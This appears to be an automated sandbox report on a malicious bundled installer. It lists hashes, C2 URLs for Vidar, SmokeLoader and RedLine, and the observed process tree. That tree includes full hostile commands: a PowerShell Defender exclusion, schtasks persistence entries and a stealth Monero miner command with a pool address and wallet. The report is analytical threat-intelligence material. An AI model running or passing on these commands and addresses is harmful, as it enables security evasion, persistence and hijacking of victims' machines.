Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
linux_amd64
Analysis
-
max time kernel
40s -
max time network
1811s -
platform
windows7_x64 -
resource
win7-jp -
submitted
11-09-2021 09:47
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-jp
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-fr
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win7-de
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-fr
Behavioral task
behavioral9
Sample
setup_x86_x64_install.exe
Resource
win10-en
Behavioral task
behavioral10
Sample
setup_x86_x64_install.exe
Resource
win10-de
Behavioral task
behavioral11
Sample
setup_x86_x64_install.exe
Resource
ubuntu-amd64
General
-
Target
setup_x86_x64_install.exe
-
Size
4.4MB
-
MD5
65eed0fdbee8b81c1b9118f86700c6fd
-
SHA1
fcca1e88a99e2f20403e963b798e3f68f58d638d
-
SHA256
3cf08993fa4866df41dc37cec849e5a5e9d0bcb6ea6660c30130d9e2fd2f623d
-
SHA512
f4c88eea9b410ea353ca9dc10c97dcfb360f9ef115d17eca1f12a4a702bc0b787cf48bfb2e6d993b8ad64ff4a0f9a2165d70eb1ae7b48652a3f5d8862543b3ac
Malware Config
Extracted
vidar
40.5
706
https://gheorghip.tumblr.com/
-
profile_id
706
Extracted
smokeloader
2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Extracted
redline
pab123
45.14.49.169:22411
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2636 1276 rundll32.exe 11 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
resource yara_rule behavioral1/memory/2188-202-0x00000000031B0000-0x00000000031CF000-memory.dmp family_redline behavioral1/memory/2188-215-0x0000000004690000-0x00000000046AE000-memory.dmp family_redline behavioral1/memory/564-325-0x000000000041C5E6-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral1/files/0x0001000000012f07-173.dat family_socelars behavioral1/files/0x0001000000012f07-115.dat family_socelars -
Vidar Stealer 1 IoCs
resource yara_rule behavioral1/memory/1712-199-0x0000000000400000-0x00000000021B7000-memory.dmp family_vidar -
resource yara_rule behavioral1/files/0x0001000000012f09-69.dat aspack_v212_v242 behavioral1/files/0x0001000000012f09-70.dat aspack_v212_v242 behavioral1/files/0x0001000000012f08-72.dat aspack_v212_v242 behavioral1/files/0x0001000000012f08-71.dat aspack_v212_v242 behavioral1/files/0x0001000000012f0b-75.dat aspack_v212_v242 behavioral1/files/0x0001000000012f0b-76.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 17 IoCs
pid Process 2020 setup_installer.exe 1096 setup_install.exe 1972 Fri191454c4b4.exe 1712 Fri192902b3c24.exe 1080 Fri192c305b4a.exe 1232 Fri192b9eeaa03b.exe 1464 WerFault.exe 688 Fri1921f7a9d3.exe 1828 Fri195cd4dbfdf37897.exe 288 Fri19870e2febf5544.exe 2116 Fri19d30056588.exe 2152 Fri19ca03f05489b.exe 2188 Fri19927b4fe38a9d1.exe 2204 Fri192b9eeaa03b.tmp 2224 Fri195cd4dbfdf37897.tmp 2776 Fri192f077acf656dd.exe 2792 46807GHF____.exe -
Loads dropped DLL 62 IoCs
pid Process 1644 setup_x86_x64_install.exe 2020 setup_installer.exe 2020 setup_installer.exe 2020 setup_installer.exe 2020 setup_installer.exe 2020 setup_installer.exe 2020 setup_installer.exe 1096 setup_install.exe 1096 setup_install.exe 1096 setup_install.exe 1096 setup_install.exe 1096 setup_install.exe 1096 setup_install.exe 1096 setup_install.exe 1096 setup_install.exe 816 cmd.exe 1992 cmd.exe 1992 cmd.exe 832 cmd.exe 976 cmd.exe 1896 WerFault.exe 1896 WerFault.exe 1712 Fri192902b3c24.exe 1712 Fri192902b3c24.exe 1644 cmd.exe 272 cmd.exe 1232 Fri192b9eeaa03b.exe 1232 Fri192b9eeaa03b.exe 1124 cmd.exe 1124 cmd.exe 288 Fri19870e2febf5544.exe 688 Fri1921f7a9d3.exe 688 Fri1921f7a9d3.exe 288 Fri19870e2febf5544.exe 1020 cmd.exe 1828 Fri195cd4dbfdf37897.exe 1828 Fri195cd4dbfdf37897.exe 1464 WerFault.exe 1464 WerFault.exe 1664 cmd.exe 2004 cmd.exe 2004 cmd.exe 1232 Fri192b9eeaa03b.exe 2188 Fri19927b4fe38a9d1.exe 2188 Fri19927b4fe38a9d1.exe 1828 Fri195cd4dbfdf37897.exe 2224 Fri195cd4dbfdf37897.tmp 2224 Fri195cd4dbfdf37897.tmp 2204 Fri192b9eeaa03b.tmp 2204 Fri192b9eeaa03b.tmp 2204 Fri192b9eeaa03b.tmp 2224 Fri195cd4dbfdf37897.tmp 2116 Fri19d30056588.exe 2116 Fri19d30056588.exe 2656 rundll32.exe 2656 rundll32.exe 2656 rundll32.exe 2656 rundll32.exe 1744 cmd.exe 2204 Fri192b9eeaa03b.tmp 2776 Fri192f077acf656dd.exe 2776 Fri192f077acf656dd.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 58 ipinfo.io 133 ipinfo.io 135 ipinfo.io 448 ipinfo.io 15 ip-api.com 54 ipinfo.io -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 9 IoCs
pid pid_target Process procid_target 1896 2104 WerFault.exe 72 3044 1584 WerFault.exe 73 2692 1712 WerFault.exe 44 2844 2000 WerFault.exe 74 2216 936 WerFault.exe 75 1464 1196 WerFault.exe 85 2492 2888 WerFault.exe 87 2072 2936 WerFault.exe 92 2308 2760 WerFault.exe 79 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Fri19870e2febf5544.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Fri19870e2febf5544.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Fri19870e2febf5544.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3208 schtasks.exe 3124 schtasks.exe 3264 schtasks.exe 4060 schtasks.exe -
Kills process with taskkill 2 IoCs
pid Process 2888 taskkill.exe 2912 taskkill.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde Fri19d30056588.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 Fri19d30056588.exe -
Script User-Agent 5 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 56 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 81 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 134 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 449 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 9 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 38 IoCs
pid Process 288 Fri19870e2febf5544.exe 288 Fri19870e2febf5544.exe 1308 Process not Found 1308 Process not Found 1308 Process not Found 1308 Process not Found 1308 Process not Found 1308 Process not Found 1308 Process not Found 1308 Process not Found 1308 Process not Found 1308 Process not Found 1308 Process not Found 1308 Process not Found 1308 Process not Found 1308 Process not Found 1308 Process not Found 1308 Process not Found 1308 Process not Found 1308 Process not Found 1308 Process not Found 1308 Process not Found 1308 Process not Found 1308 Process not Found 1308 Process not Found 1308 Process not Found 1308 Process not Found 1308 Process not Found 1308 Process not Found 1308 Process not Found 1308 Process not Found 1308 Process not Found 1308 Process not Found 1668 powershell.exe 1308 Process not Found 1308 Process not Found 1308 Process not Found 1308 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 288 Fri19870e2febf5544.exe -
Suspicious use of AdjustPrivilegeToken 36 IoCs
description pid Process Token: SeCreateTokenPrivilege 2116 Fri19d30056588.exe Token: SeAssignPrimaryTokenPrivilege 2116 Fri19d30056588.exe Token: SeLockMemoryPrivilege 2116 Fri19d30056588.exe Token: SeIncreaseQuotaPrivilege 2116 Fri19d30056588.exe Token: SeMachineAccountPrivilege 2116 Fri19d30056588.exe Token: SeTcbPrivilege 2116 Fri19d30056588.exe Token: SeSecurityPrivilege 2116 Fri19d30056588.exe Token: SeTakeOwnershipPrivilege 2116 Fri19d30056588.exe Token: SeLoadDriverPrivilege 2116 Fri19d30056588.exe Token: SeSystemProfilePrivilege 2116 Fri19d30056588.exe Token: SeSystemtimePrivilege 2116 Fri19d30056588.exe Token: SeProfSingleProcessPrivilege 2116 Fri19d30056588.exe Token: SeIncBasePriorityPrivilege 2116 Fri19d30056588.exe Token: SeCreatePagefilePrivilege 2116 Fri19d30056588.exe Token: SeCreatePermanentPrivilege 2116 Fri19d30056588.exe Token: SeBackupPrivilege 2116 Fri19d30056588.exe Token: SeRestorePrivilege 2116 Fri19d30056588.exe Token: SeShutdownPrivilege 2116 Fri19d30056588.exe Token: SeDebugPrivilege 2116 Fri19d30056588.exe Token: SeAuditPrivilege 2116 Fri19d30056588.exe Token: SeSystemEnvironmentPrivilege 2116 Fri19d30056588.exe Token: SeChangeNotifyPrivilege 2116 Fri19d30056588.exe Token: SeRemoteShutdownPrivilege 2116 Fri19d30056588.exe Token: SeUndockPrivilege 2116 Fri19d30056588.exe Token: SeSyncAgentPrivilege 2116 Fri19d30056588.exe Token: SeEnableDelegationPrivilege 2116 Fri19d30056588.exe Token: SeManageVolumePrivilege 2116 Fri19d30056588.exe Token: SeImpersonatePrivilege 2116 Fri19d30056588.exe Token: SeCreateGlobalPrivilege 2116 Fri19d30056588.exe Token: 31 2116 Fri19d30056588.exe Token: 32 2116 Fri19d30056588.exe Token: 33 2116 Fri19d30056588.exe Token: 34 2116 Fri19d30056588.exe Token: 35 2116 Fri19d30056588.exe Token: SeDebugPrivilege 1668 powershell.exe Token: SeShutdownPrivilege 1308 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1644 wrote to memory of 2020 1644 setup_x86_x64_install.exe 26 PID 1644 wrote to memory of 2020 1644 setup_x86_x64_install.exe 26 PID 1644 wrote to memory of 2020 1644 setup_x86_x64_install.exe 26 PID 1644 wrote to memory of 2020 1644 setup_x86_x64_install.exe 26 PID 1644 wrote to memory of 2020 1644 setup_x86_x64_install.exe 26 PID 1644 wrote to memory of 2020 1644 setup_x86_x64_install.exe 26 PID 1644 wrote to memory of 2020 1644 setup_x86_x64_install.exe 26 PID 2020 wrote to memory of 1096 2020 setup_installer.exe 31 PID 2020 wrote to memory of 1096 2020 setup_installer.exe 31 PID 2020 wrote to memory of 1096 2020 setup_installer.exe 31 PID 2020 wrote to memory of 1096 2020 setup_installer.exe 31 PID 2020 wrote to memory of 1096 2020 setup_installer.exe 31 PID 2020 wrote to memory of 1096 2020 setup_installer.exe 31 PID 2020 wrote to memory of 1096 2020 setup_installer.exe 31 PID 1096 wrote to memory of 572 1096 setup_install.exe 33 PID 1096 wrote to memory of 572 1096 setup_install.exe 33 PID 1096 wrote to memory of 572 1096 setup_install.exe 33 PID 1096 wrote to memory of 572 1096 setup_install.exe 33 PID 1096 wrote to memory of 572 1096 setup_install.exe 33 PID 1096 wrote to memory of 572 1096 setup_install.exe 33 PID 1096 wrote to memory of 572 1096 setup_install.exe 33 PID 1096 wrote to memory of 832 1096 setup_install.exe 34 PID 1096 wrote to memory of 832 1096 setup_install.exe 34 PID 1096 wrote to memory of 832 1096 setup_install.exe 34 PID 1096 wrote to memory of 832 1096 setup_install.exe 34 PID 1096 wrote to memory of 832 1096 setup_install.exe 34 PID 1096 wrote to memory of 832 1096 setup_install.exe 34 PID 1096 wrote to memory of 832 1096 setup_install.exe 34 PID 1096 wrote to memory of 976 1096 setup_install.exe 35 PID 1096 wrote to memory of 976 1096 setup_install.exe 35 PID 1096 wrote to memory of 976 1096 setup_install.exe 35 PID 1096 wrote to memory of 976 1096 setup_install.exe 35 PID 1096 wrote to memory of 976 1096 setup_install.exe 35 PID 1096 wrote to memory of 976 1096 setup_install.exe 35 PID 1096 wrote to memory of 976 1096 setup_install.exe 35 PID 1096 wrote to memory of 816 1096 setup_install.exe 36 PID 1096 wrote to memory of 816 1096 setup_install.exe 36 PID 1096 wrote to memory of 816 1096 setup_install.exe 36 PID 1096 wrote to memory of 816 1096 setup_install.exe 36 PID 1096 wrote to memory of 816 1096 setup_install.exe 36 PID 1096 wrote to memory of 816 1096 setup_install.exe 36 PID 1096 wrote to memory of 816 1096 setup_install.exe 36 PID 1096 wrote to memory of 272 1096 setup_install.exe 37 PID 1096 wrote to memory of 272 1096 setup_install.exe 37 PID 1096 wrote to memory of 272 1096 setup_install.exe 37 PID 1096 wrote to memory of 272 1096 setup_install.exe 37 PID 1096 wrote to memory of 272 1096 setup_install.exe 37 PID 1096 wrote to memory of 272 1096 setup_install.exe 37 PID 1096 wrote to memory of 272 1096 setup_install.exe 37 PID 572 wrote to memory of 1668 572 cmd.exe 38 PID 572 wrote to memory of 1668 572 cmd.exe 38 PID 572 wrote to memory of 1668 572 cmd.exe 38 PID 572 wrote to memory of 1668 572 cmd.exe 38 PID 572 wrote to memory of 1668 572 cmd.exe 38 PID 572 wrote to memory of 1668 572 cmd.exe 38 PID 572 wrote to memory of 1668 572 cmd.exe 38 PID 1096 wrote to memory of 1992 1096 setup_install.exe 39 PID 1096 wrote to memory of 1992 1096 setup_install.exe 39 PID 1096 wrote to memory of 1992 1096 setup_install.exe 39 PID 1096 wrote to memory of 1992 1096 setup_install.exe 39 PID 1096 wrote to memory of 1992 1096 setup_install.exe 39 PID 1096 wrote to memory of 1992 1096 setup_install.exe 39 PID 1096 wrote to memory of 1992 1096 setup_install.exe 39 PID 816 wrote to memory of 1972 816 cmd.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Users\Admin\AppData\Local\Temp\7zS4E7BF844\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS4E7BF844\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1096 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:572 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1668
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri192c305b4a.exe4⤵
- Loads dropped DLL
PID:832 -
C:\Users\Admin\AppData\Local\Temp\7zS4E7BF844\Fri192c305b4a.exeFri192c305b4a.exe5⤵
- Executes dropped EXE
PID:1080
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri192b9eeaa03b.exe4⤵
- Loads dropped DLL
PID:976 -
C:\Users\Admin\AppData\Local\Temp\7zS4E7BF844\Fri192b9eeaa03b.exeFri192b9eeaa03b.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1232
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri191454c4b4.exe4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:816 -
C:\Users\Admin\AppData\Local\Temp\7zS4E7BF844\Fri191454c4b4.exeFri191454c4b4.exe5⤵
- Executes dropped EXE
PID:1972 -
C:\ProgramData\3559769.exe"C:\ProgramData\3559769.exe"6⤵PID:2760
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2760 -s 17287⤵
- Program crash
PID:2308
-
-
-
C:\ProgramData\3471607.exe"C:\ProgramData\3471607.exe"6⤵PID:2788
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵PID:2868
-
-
-
C:\ProgramData\8167015.exe"C:\ProgramData\8167015.exe"6⤵PID:2888
-
C:\ProgramData\8167015.exe"C:\ProgramData\8167015.exe"7⤵PID:564
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2888 -s 7127⤵
- Program crash
PID:2492
-
-
-
C:\ProgramData\3030793.exe"C:\ProgramData\3030793.exe"6⤵PID:1224
-
-
C:\ProgramData\4709162.exe"C:\ProgramData\4709162.exe"6⤵PID:2936
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2936 -s 17687⤵
- Program crash
PID:2072
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri195cd4dbfdf37897.exe4⤵
- Loads dropped DLL
PID:272 -
C:\Users\Admin\AppData\Local\Temp\7zS4E7BF844\Fri195cd4dbfdf37897.exeFri195cd4dbfdf37897.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1828 -
C:\Users\Admin\AppData\Local\Temp\is-IJ3FO.tmp\Fri195cd4dbfdf37897.tmp"C:\Users\Admin\AppData\Local\Temp\is-IJ3FO.tmp\Fri195cd4dbfdf37897.tmp" /SL5="$70160,138429,56832,C:\Users\Admin\AppData\Local\Temp\7zS4E7BF844\Fri195cd4dbfdf37897.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2224 -
C:\Users\Admin\AppData\Local\Temp\is-M2U90.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-M2U90.tmp\Setup.exe" /Verysilent7⤵PID:1972
-
C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent8⤵PID:3780
-
C:\Users\Admin\AppData\Local\Temp\is-H3V0K.tmp\stats.tmp"C:\Users\Admin\AppData\Local\Temp\is-H3V0K.tmp\stats.tmp" /SL5="$302F0,138429,56832,C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent9⤵PID:3820
-
C:\Users\Admin\AppData\Local\Temp\is-9F8UQ.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-9F8UQ.tmp\Setup.exe" /Verysilent10⤵PID:3296
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit11⤵PID:2344
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'12⤵
- Creates scheduled task(s)
PID:3208
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"11⤵PID:4064
-
-
C:\Users\Admin\AppData\Local\Temp\Services.exe"C:\Users\Admin\AppData\Local\Temp\Services.exe"11⤵PID:3224
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit12⤵PID:3852
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'13⤵
- Creates scheduled task(s)
PID:3124
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"12⤵PID:3960
-
-
C:\Windows\System32\conhost.exeC:\Windows/System32\conhost.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-asia1.nanopool.org:14444 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=60 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth12⤵PID:2672
-
-
-
-
-
-
C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"8⤵PID:3772
-
C:\Users\Admin\AppData\Local\Temp\Mortician.exe"C:\Users\Admin\AppData\Local\Temp\Mortician.exe"9⤵PID:1984
-
C:\Users\Admin\AppData\Local\Temp\Mortician.exeC:\Users\Admin\AppData\Local\Temp\Mortician.exe10⤵PID:4044
-
-
-
C:\Users\Admin\AppData\Local\Temp\foradvertising.exe"C:\Users\Admin\AppData\Local\Temp\foradvertising.exe" /wws19⤵PID:3952
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri192902b3c24.exe4⤵
- Loads dropped DLL
PID:1992 -
C:\Users\Admin\AppData\Local\Temp\7zS4E7BF844\Fri192902b3c24.exeFri192902b3c24.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1712 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1712 -s 9806⤵
- Program crash
PID:2692
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri19d30056588.exe4⤵
- Loads dropped DLL
PID:1020 -
C:\Users\Admin\AppData\Local\Temp\7zS4E7BF844\Fri19d30056588.exeFri19d30056588.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2116 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:2236
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:2912
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri19b9b73e83c948b1d.exe /mixone4⤵PID:1896
-
C:\Users\Admin\AppData\Local\Temp\7zS4E7BF844\Fri19b9b73e83c948b1d.exeFri19b9b73e83c948b1d.exe /mixone5⤵PID:1464
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Fri19b9b73e83c948b1d.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS4E7BF844\Fri19b9b73e83c948b1d.exe" & exit6⤵PID:2812
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Fri19b9b73e83c948b1d.exe" /f7⤵
- Kills process with taskkill
PID:2888
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1921f7a9d3.exe4⤵
- Loads dropped DLL
PID:1644 -
C:\Users\Admin\AppData\Local\Temp\7zS4E7BF844\Fri1921f7a9d3.exeFri1921f7a9d3.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:688
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri192f077acf656dd.exe4⤵
- Loads dropped DLL
PID:1744 -
C:\Users\Admin\AppData\Local\Temp\7zS4E7BF844\Fri192f077acf656dd.exeFri192f077acf656dd.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2776 -
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"6⤵PID:2948
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit7⤵PID:3200
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'8⤵
- Creates scheduled task(s)
PID:3264
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"7⤵PID:3348
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:4004
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:4060
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"8⤵PID:4036
-
-
